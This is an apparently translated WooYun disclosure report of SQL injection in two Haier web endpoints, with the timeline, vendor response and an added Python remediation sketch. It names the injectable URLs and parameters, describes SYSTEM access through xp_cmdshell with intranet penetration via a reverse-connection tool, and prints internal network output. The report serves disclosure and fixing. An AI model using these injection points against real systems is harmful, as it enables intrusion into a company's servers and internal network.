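2015-10-26: Details reported to the vendor; awaiting vendor handling
2015-10-26: Vendor confirmed; details disclosed to the vendor only
2015-11-05: Details disclosed to core white hats and experts in related fields
2015-11-15: Details disclosed to regular white hats
2015-11-25: Details disclosed to intern white hats
2015-12-10: Details disclosed to the public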
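Database server
http://gopurchase.haier.com/GOPurchase/Common/ConsultSupplyerBank.aspx?cId=inbankNo&cNm=inbankNm&strWhere=&selectType=0&selectIds=a" -p "strWhere"
The strWhere parameter.
The web site and the database are on separate hosts.
16H database server~~~ it comes with that xp_cmdshell thing by default.
SYSTEM privileges; users can be added, and a reverse-connection tool can be uploaded for intranet penetration.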
command standard output:
---
Windows IP Configuration

Ethernet adapter 本地连接 5:
   Connection-specific DNS Suffix . :
   IP Address. . . . . . . . . . . . : 10.135.106.44
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.135.106.1

Ethernet adapter 本地连接 2:
   Connection-specific DNS Suffix . :
   IP Address. . . . . . . . . . . . : 172.11.178.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
---
Can do whatever one wants~!
As above. As a bonus, one more SQL injection:
http://idea.haier.com//mas/front/live/mao?method=list&search=1001&sField=1&sOpr=like&sWord=1
The sField parameter.
Ops folks, step it up~
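A remediation sketch for the search endpoint above, added here as an example and not taken from the report or the vendor's code: the client-supplied sField and sOpr are resolved through server-side allowlists and sWord is bound as a parameter, so none of the three can alter the SQL text. The table name, the field and operator maps, and the use of sqlite3 in place of the real SQL Server backend are all assumptions.

```python
import sqlite3

# Hypothetical server-side maps: the client sends only short ids/keywords,
# never column names or SQL fragments.
FIELDS = {"1": "title", "2": "author"}      # sField -> column (assumed)
OPERATORS = {"like": "LIKE", "eq": "="}     # sOpr   -> operator (assumed)

def build_search(s_field, s_opr, s_word):
    """Return (sql, params) for the search, or raise ValueError."""
    try:
        column = FIELDS[s_field]
        operator = OPERATORS[s_opr]
    except KeyError:
        raise ValueError("unsupported search field or operator") from None
    if operator == "LIKE":
        # Escape LIKE wildcards so the user's text matches literally.
        escaped = (s_word.replace("\\", "\\\\")
                         .replace("%", "\\%").replace("_", "\\_"))
        return (f"SELECT id, title FROM ideas WHERE {column} LIKE ? ESCAPE '\\'",
                [f"%{escaped}%"])
    return f"SELECT id, title FROM ideas WHERE {column} = ?", [s_word]

def search(conn, s_field, s_opr, s_word):
    sql, params = build_search(s_field, s_opr, s_word)
    return conn.execute(sql, params).fetchall()

def demo_db():
    # Constructed sample data, standing in for the real database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ideas (id INTEGER, title TEXT, author TEXT)")
    conn.executemany("INSERT INTO ideas VALUES (?, ?, ?)",
                     [(1, "fridge 1001", "li"), (2, "washer", "wang")])
    return conn

if __name__ == "__main__":
    print(search(demo_db(), "1", "like", "1001"))
```

The same pattern applies to a parameter that carries a whole filter, as the name strWhere suggests: accept structured field, operator and value inputs and assemble the WHERE clause on the server.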
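Severity: High
Vulnerability Rank: 11
Confirmed at: 2015-10-26 17:56
Thanks to the white hat on the WooYun platform for the testing and the reminder; we have assigned staff to handle it.
None yet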